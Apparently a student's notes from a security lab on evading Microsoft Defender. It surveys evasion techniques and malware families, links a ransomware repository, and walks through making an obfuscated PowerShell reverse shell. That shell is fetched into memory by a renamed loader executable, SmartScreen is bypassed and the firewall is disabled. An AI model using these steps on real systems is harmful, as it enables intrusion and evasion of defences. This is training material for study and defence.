Breaking defender Firewall art of hacking

Overview

In this lab, we will provide an introduction to evading antivirus defenses - specifically Microsoft
Defender, the ubiquitous security solution included in the Windows operating system. We will begin
this lesson by reviewing types of antivirus software and providing an overview of Microsoft Defender
and Microsoft SmartScreen, and conclude by surveying various techniques that attackers, red teams,
and penetration testers use to evade antivirus.

Types of Antivirus Software

There are four types of antivirus software: signature-based, heuristic, behavior-based, and adaptive
(sometimes called AI-based):

 Signature-based antivirus looks for patterns in known malware and takes action based on
those patterns.

 Heuristic antivirus uses pattern-based and dynamic analysis to determine if software

contains malware. Heuristic antivirus runs suspected code in an isolated environment called
a sandbox.

 Behavior-based antivirus is similar to heuristic antivirus in that it focuses on what malware

does. The difference is that behavior-based antivirus watches suspected malware in real time
- unlike a sandbox. Therefore, if a "benign" application starts behaving in a malicious way,
behavior-based antivirus will take action.

 Adaptive antivirus learns and adapts to new forms of malware and creates new signatures
as needed. Adaptive antivirus uses a cloud-based submission system so that new attack
signatures can be shared with others.

Microsoft Defender and Windows SmartScreen

Windows operating systems come with Microsoft Defender Antivirus built in. Microsoft Defender has
improved drastically since its early days, which makes sense given that Windows systems are a
preferred malware target. The current incarnation of Microsoft Defender is signature-based,
heuristic, behavior-based, and adaptive. Unsurprisingly, modern Microsoft Defender is difficult to
evade. While there are many published tools and frameworks designed to trick or bypass Microsoft
Defender, thanks to cloud sharing, most of them lose effectiveness as time passes.

In addition to Microsoft Defender, malware developers must also deal with Windows SmartScreen.
Windows SmartScreen will stop any application from running if it is not signed and trusted. A signed
application has a valid code-signing certificate from a recognized certificate authority (CA). Said CA
must also be trusted, meaning the software using a given CA is legitimate. If a given CA is found in
malware too often, it will be listed as untrusted by antivirus vendors.

Windows Antimalware Scan Interface

Microsoft Defender is built upon the Windows Antimalware Scan Interface ( AMSI). According to
Microsoft, AMSI is a "versatile interface standard that allows your applications and services to
integrate with any anti-malware product that's present on a machine. [...] AMSI is agnostic of anti-
malware vendor; it's designed to allow for the most common malware scanning and protection
techniques provided by today's anti-malware products that can be integrated into applications. It
supports a calling structure allowing for file and memory or stream scanning, content source URL/IP
reputation checks, and other techniques."

This is all to say that the AMSI is a standardized interface that allows application developers to
integrate with antivirus software and other security solutions to detect and block malicious activity in
real time.

For details on AMSI's architecture and examples of how it works, see:

https://learn.microsoft.com/en-us/windows/win32/amsi/how-amsi-helps

Evasion Techniques and Tactics

To keep ahead of modern antivirus and EDR solutions, malware developers must use a number of
techniques and tactics. These tactics include the use of polymorphic code, fileless
loading, encryption, code injection, DLL hijacking, detecting sandboxes, and sleeping.

Polymorphic Code

Polymorphic code is malware that changes its code structure with each execution, making it harder
for signature-based detection systems to recognize. Polymorphic malware employs code mutation
techniques to alter its appearance while retaining its core functionality. These mutations can involve
changes to the code's instructions, encryption keys, variable names, and other characteristics. In
some cases, the malware generates new code variants for each infection. Polymorphic malware often
uses obfuscation techniques to make its code more difficult to analyze. These obfuscation techniques
include adding meaningless instructions, inserting junk code, using xor, and reversing code.

What Does a Polymorphic Virus Do?

A polymorphic virus attack follows a predictable path. First, the cybercriminal encrypts the virus
code, masking it so that it can pass undetected through antivirus software or anti-malware software.
Once the virus has bypassed security, it will be installed on the computer network via a
specific endpoint. After it has been installed, the infected virus file is decrypted.

A mutation engine quickly crafts a new routine for decrypting the virus file, so that it looks like a
completely different file. This makes the virus undetectable by security tools, so it can pass through
security barriers undetected once again — even if an earlier variation of the same virus has been
identified and blocked in the past.
Once it has gained access to the computer network, the virus will produce malicious code that can
further the process, copying itself and shifting its identifiable traits so that it can penetrate further
into the computer system, causing lasting damage.

Examples of Polymorphic Viruses

There are many famous polymorphic viruses that have gained attention for the specific types of
damage they can inflict. Here are a few variations of polymorphic virus attacks.

VirLock Ransomware Attack

VirLock was an early example of polymorphic ransomware. The malware was passed from computer
to computer via cloud storage access points and shared apps. Once it was deeply embedded, the
malware acted like ransomware, locking users out of the system and demanding that victims pay the
ransom or lose access to secure systems and files.

Storm Worm Multi-Layer Attack

The infamous 2007 Storm Worm attack was a Trojan passed along via email. When unsuspecting
victims opened the file attached to the email, the virus was released, infecting the computer and
transforming the victim’s computer system into a bot. The Storm Worm attack affected over 1 million
distinct endpoints, causing damage to thousands of victims.

CryptoWall Ransomware Attack

The CryptoWall polymorphic virus is another example of ransomware. The virus variation infects a
user’s computer system, encrypts the files stored there so the user cannot access their secure files,
and then demands a fee to decrypt the files again. The mutation engine powering CryptoWall can
provide nearly endless varieties of transformations for each new attack.

Beebone Malware Attack

Beebone used polymorphic malware to take over thousands of individual computers. With access to
this vast network, bad actors created a botnet that they could use to attack financial institutions with
ransomware and spyware attacks.
Fileless Loading

Fileless loading places a payload directly into system RAM, leaving no trace on a disk or SSD. Fileless
malware often leverages legitimate system administration tools and features such as PowerShell,
WMI (Windows Management Instrumentation), and Windows Registry to carry out malicious
activities. Using these trusted tools, fileless malware evades suspicion and blends in with normal
system behavior.

What is Fileless Malware?

Definition of fileless malware

“What’s fileless malware?” and “What’s the difference between fileless and traditional file-based
malware?” are two questions we’re often asked on this topic.

First, fileless malware is often called memory-resident malware. It's a type of malicious software that
resides entirely in RAM memory. It doesn’t create executable files on your hard drive like traditional
file-based malware -- it bypasses the file system entirely.

This means fileless malware can easily evade traditional file-based antivirus detection tools, which
makes it extremely dangerous.

Fileless malware can also run on trusted scripts like PowerShell, VBScript, or Python.

Examples of fileless malware

Examples of fileless malware include:

 Code Red, which was one of the first fileless malware variants. It infected 350,000 servers in
2001.

 Pyloose, which attaches itself to Python code to install cryptocurrency miners in cloud
environments

 DarkWatchman, which targeted individuals in the finance, transport, energy, and software
security industries in Estonia, Latvia, Kazakhstan, and Russia

 Poweliks, which uses JavaScript and PowerShell code to infect systems

 Kovter, an extremely persistent fileless type that uses mshta.exe to execute

  Panda Stealer, a cryptocurrency-stealing malware which spreads via Discord

Encryption

Encrypted malware cannot be detected until it is decrypted. Typically, a loader program decrypts the
payload and injects it into memory or an existing process. While encrypted payloads may be
undetectable, the loaders themselves become well-known and detected over time.

Like github viruses repositories. The files that are encrypted with RAR particularly can particularly not
execute.

https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0?tab=readme-ov-file

Code Injection

Code injection writes malicious code into the allocated memory space of a target process. First, the
attacker identifies a target process on the victim's system. This process will have the necessary
permissions and privileges to perform the desired malicious actions. Common targets include system
processes or user applications with elevated privileges. The attacker identifies a vulnerability or
weakness in the target process that can be exploited to inject malicious code. This could be a buffer
overflow, insecure input validation, or inadequate access controls that allow the attacker to write
data into the process's memory space.

Code injection can take various forms:

 Shellcode Injection: The attacker injects shellcode, which is a small piece of assembly code
designed to perform specific actions, such as spawning a shell or downloading additional
payloads.

 DLL Injection: The attacker injects a malicious dynamic-link library (DLL) into the address
space of a target process. By hooking into the target process's execution, the injected DLL
can intercept function calls, modify data, or execute arbitrary code within the context of the
process.

 Process Hollowing: The attacker creates a new suspended process and replaces its memory
contents with the malicious payload. This technique involves allocating memory within the
suspended process, writing the malicious code into the allocated memory, and then
resuming the process execution with the injected code.

 Reflective DLL Injection: This technique involves injecting a DLL into a target process without
relying on external DLL files. The injected DLL contains reflective code that can dynamically
load and execute itself entirely from memory, making it more difficult for security tools to
detect.

DLL Hijacking ( do this practically)

DLL hijacking loads a malicious DLL through a legitimate executable, potentially bypassing detection
mechanisms. Attackers first identify applications that dynamically load DLLs without specifying the
full path to the DLL. The attacker places a malicious DLL with the same filename as the legitimate DLL
in a directory searched by the target application's DLL search order. Common locations include the
current working directory, the Windows system directory, or directories included in the system's
PATH environment variable. If the attacker-controlled directory is searched before the directory
containing the legitimate DLL, Windows will load the malicious DLL instead of the legitimate one.

Some examples of DLL hijacking malware include:

 APT41: Uses search order hijacking]

attacks 2024: https://www.seqrite.com/blog/pakistani-apts-escalate-attacks-on-indian-gov-seqrite-

labs-unveils-threats-and-connections/

 FinFisher: Variants use DLL search order hijacking

FinFisher, also known as FinSpy,[1] is surveillance software marketed by Lench IT Solutions plc, which
markets the spyware through law enforcement channels.[1]

FinFisher can be covertly installed on targets' computers by exploiting security lapses in

the update procedures of non-suspect software.[2][3][4] The company has been criticized by human
rights organizations for selling these capabilities to repressive or non-democratic states known for
monitoring and imprisoning political dissidents.[5] Egyptian dissidents who ransacked the offices
of Egypt's secret police following the overthrow of Egyptian President Hosni Mubarak reported that
they had discovered a contract with Gamma International for €287,000 for a license to run the
FinFisher software.[6] In 2014, an American citizen sued the Ethiopian government for surreptitiously
installing FinSpy onto his computer in America and using it to wiretap his private Skype calls and
monitor his entire family's every use of the computer for a period of months.[7][8]

 Chaes: Uses search order hijacking to load malicious DLL payloads

 Astaroth: Uses search order hijacking to launch itself

 BOOSTWRITE: Exploits loading of legitimate .dll file

 BackdoorDipolomacy: Uses search order hijacking

 HinKit: Uses search order hijacking as a persistence mechanism

 Crutch: Persists a search order hijacking through search engines

 Downdelph: Escalates privileges through search order hijacking of .exe files

  InvisiMole: Uses search order hijacking to launch infected DLL during startup

Broader definition:

An advanced persistent threat (APT) itself isn’t a specific type of software, but instead is defined as a
highly sophisticated threat actor with the resources and knowledge needed to stage a long-term
attack campaign and remain undetected for extended periods of time. APTs may use a wide variety
of techniques to attack their targets, including malware and ransomware strains.

Because of this, APT protection is frequently discussed alongside anti-malware and anti-ransomware
strategies. Yet while APTs are just as serious as malware and ransomware, they’re not quite in the
same category.

These attackers get their name because they fit three criteria:

 They have advanced intelligence-gathering capabilities and techniques and can develop their
own tools and methods to further their attacks.

 They pursue specific objectives and take time to carefully target victims, in contrast to the
opportunistic approach taken by most other attackers.

 They are highly skilled, well-funded, and extremely coordinated.

The funding and resources required for these advanced attacks mean that most APTs are state-
sponsored or are nation-state threat actors themselves, supported directly or indirectly by world
governments. This also means that APTs typically have political or economic goals—but that doesn’t
mean that they exclusively target the public sector.

The most common APT targets

Far from a singular focus on the public sector, APTs will attack any business that helps them advance
their goals.

The most common targets for advanced persistent threats include:

 Financial institutions

 Energy providers and infrastructure

 Health care services and providers

 Telecommunications providers and infrastructure

 Agriculture

 Manufacturing

 Higher education

Defending against APTs takes deep security expertise and knowledge, correlating activity in one part
of a network to activity on an endpoint or in a cloud service.
DLL hijacking can be carried out using a number of techniques, including:

 DLL side-loading: Attackers rename a malicious DLL to the same name as a legitimate DLL
and drop it in the same directory.

 DLL search order hijacking: Attackers manipulate the order in which a program searches for
DLLs.

 Phantom DLL loading: Attackers plant a malicious DLL with the same name as a DLL that
doesn't exist or is missing.

Detecting Sandboxes

Malware may perform checks to detect if it's running in a sandbox or virtualized environment
commonly used for dynamic/heuristic analysis. These checks involve querying system information,
checking for the presence of virtualization artifacts, examining environmental variables, and looking
for user applications. A single CPU, little disk space, a tiny amount of RAM, and no user applications
are all dead giveaways for a sandbox. If the malware detects a sandbox environment, it will alter its
behavior or remain dormant to evade detection.

Sleeping

Malware can evade detection during initial analysis runs by waiting for a certain period or until
specific conditions are met. This tactic is surprisingly effective given that antivirus software is
generally disliked for making computer systems feel slow and, thus, will only wait so long for a
payload to show malicious behavior.

Practice activity

Part 1: Using PowerShell to Enumerate the Victim Host

In this part of the lab, we will use PowerShell to enumerate the security posture of a Windows server.
The information we discover will inform our evasion tactics later in the lab.

1. Using the Machines tab, connect to the Windows Victim server.

 2. Right-click the Start icon in the lower-left corner and select Windows PowerShell (Admin).

When prompted, click Yes to continue. It may take 20-30 seconds for PowerShell to fully
open.

3. At the PowerShell prompt, type the following command and press Enter.
Get-MpComputerStatus | Select-Object AntiVirusEnabled, AntiVirusSignatureLastUpdated

This command tells us two things: whether Microsoft Defender is enabled, and when the antivirus
signatures were last updated.

4. At the PowerShell prompt, type the following command and press Enter.
Get-MpPreference | Select-Object ExclusionPath, SubmitSamplesConsent

It's always good to know if there is a place on disk that Microsoft Defender can't scan as indicated by
the ExclusionPath. The SubmitSamplesConsent property will indicate whether malware samples are
submitted to Microsoft (1) or not (0).

5. At the PowerShell prompt, type the following command and press Enter.
Get-NetFirewallProfile | Select-Object Name, Enabled

The output indicates if the Windows Firewall is enabled for each profile.
 6. At the PowerShell prompt, type the following command and press Enter.
Get-NetFirewallRule -Direction Outbound -Enabled True | Select-Object DisplayName, Action

This command tell us if any services/ports are blocked for outbound traffic. Most payloads use
reverse binding, where the Windows victim connects to the attacker. For this reason, it good to know
if any outbound traffic is blocked by the firewall.

7. Close PowerShell.

Now that we have a basic handle on the security posture of the victim system, let's try to
craft successful payloads that bypass Microsoft Defender.

Self practice screenshots:

Step 3:
Here date is appearing check why

Step 4:

5
Part 2: Evading Behavioral Analysis

In this part of the lab, we will attempt to evade behavioral analysis. We will take a known malicious
PowerShell script and change the way we execute the payload to avoid being detected by Microsoft
Defender.

Before:
After:

1. Using the Machines tab, connect to the Kali server.

2. Open a new terminal window.

It may take 20-30 seconds for the new terminal window to open.

3. At the prompt, type ip a and press Enter to get the IP address of the Kali server.

Write down the IP address of the Kali server. You will use this throughout the rest of the lab.

4. At the prompt, type cd Get-ReverseShell and press Enter to change directories.

Get-ReverseShell is a tool used to create a reverse shell using obfuscated PowerShell.

5. At the prompt, type pwsh and press Enter to start PowerShell.

You will notice the prompt change from $ to PS>.

6. At the PS> prompt, type Import-Module . /get-reverseshell.ps1 and press Enter

to import the Get-ReverseShell module into PowerShell.

7. At the PS> prompt, type the following command and press Enter to generate the payload:
get-reverseshell -Ip <ip> -Port 1234 -OutFile connect.ps1
Be sure to replace <ip> with the IP address of the Kali server.
 You will see "Writing payload to connect.ps1" when the PowerShell command completes.

8. At the PS> prompt, type cat ./connect.ps1 and press Enter to view the code.

You will see what looks like indecipherable gibberish on screen. What you are looking at is an
obfuscated reverse TCP shell written in PowerShell.

Despite being obfuscated, Microsoft Defender will still catch this shell as soon as it is written to disk.
To avoid this, we will create a benign application that will act as a loader for our reverse shell. This
loader will reach out to a web server we control, grab connect.ps1, and load it directly into memory.

9. At the PS> prompt, type cp ../loader.ps1 . and press Enter to copy the loader script to the
current directory.
 10. At the PS> prompt, type nano ./loader.ps1 to open loader.ps1 in the Nano editor.

You will notice that loader.ps1 has only four lines of code:

The first line creates a variable for the web address and file we want loader to download.

The next two lines of code will break a file into bytes.

The last line of code loads the bytes directly into memory.

11. Use the Nano editor to change <ip> to the IP address of the Kali server and
change <file_name> to connect.ps1.

12. Press CTRL-O and press Enter to save your changes.

13. Press CTRL-X to exit Nano.

14. At the PS> prompt, type python3 -m http.server 80 and press Enter to start a python
webserver.

Next, we will move loader.ps1 over to our Windows Attack system and convert it to an
executable using PowerShell.

15. Using the Machines tab, connect to the Windows Attacker server.

16. Right-click the Start icon in the lower left-hand corner and select Windows PowerShell.

Note: Do not select Windows PowerShell (Admin).

17. At the PowerShell prompt, type cd Desktop and press Enter.

18. At the PowerShell prompt, type the following command and press Enter:
Invoke-WebRequest -Uri http://<ip>/loader.ps1 -OutFile loader.ps1
Be sure to replace <ip> with the IP address of the Kali server.
 You will see a copy of loader.ps1 appear on the Desktop of the Windows Attacker server.

19. At the PowerShell prompt, type the following command and press Enter:
Invoke-PS2EXE .\loader.ps1 pancake.exe
We have taken the loader.ps1 script and converted it to an executable named pancake.exe.
We are hoping that pancake.exe will not set off any alarms on the victim system.

Note: Why the silly name? In testing, we found that names like update.exe, patch.exe, or
readme.exe (etc.) can trigger Microsoft Defender's interest. Defender may not see the code
itself as malicious per se, but it might ask you to submit a sample to Microsoft.

20. At the PowerShell prompt, ipconfig and press Enter to display the IP Address of the Windows
Attacker server.

Write down the IP address of the Windows Attacker server. You will use this throughout the
rest of the lab. You should now have both the IP address of the Kali server and the Windows
Attacker written down.

21. At the PowerShell prompt, type python -m http.server 80 and press Enter to start a Python
web server on the Windows Attacker server.

22. Using the Machines tab, connect to the Windows Victim server.

23. On the Windows Victim server, open Firefox.

It may take 20-30 seconds for Firefox to open.

24. In Firefox, navigate to the IP Address of the Windows Attacker server.

Note: If you are unable to reach the server, re-connect to the Windows Attacker server from
the Machines tab, then click the Search icon, search for Firewall, and open the Windows
Defender Firewall. From the Windows Defender Firewall, click the Turn Windows Defender
Firewall On or Off link on the left and select the Turn Off Windows Firewall under the Public
Network Settings, then return to Windows Victim and try again.

25. On the Directory listing page, click pancake.exe to download the file to the Windows Victim
server.

Wait a few minutes to see if Microsoft Defender detects pancake.exe as malicious. You can
even drag it to the Desktop to speed up detection.
 26. Using the Machines tab, connect to the Kali server.

27. Open a new terminal window, then type nc -lvnp 1234 and press Enter to start a listener for
our connect.ps1 payload.

Note: Be sure to open a new window, not a new tab.

28. Using the Machines tab, connect to the Windows Victim server.

29. Double-click pancake.exe to run the executable.

You will be prompted with a message from Windows SmartScreen because our executable
does not have a proper signing certificate. Click More info, then click Run anyway to bypass
this warning.

Note: Microsoft Defender is still active, even when we bypass SmartScreen.

30. Using the Machines tab, connect to the Kali server.

You should see a connection in the new terminal window, and in the original terminal
window on Kali you will see that the Windows Victim did in fact download a copy of
connect.ps1 from the Kali Python web server.

Take note of the connection message in the new terminal window. You will need it to answer
one of the questions on the Tasks tab.

31. On the Kali server, close all open terminal windows.

Self screenshots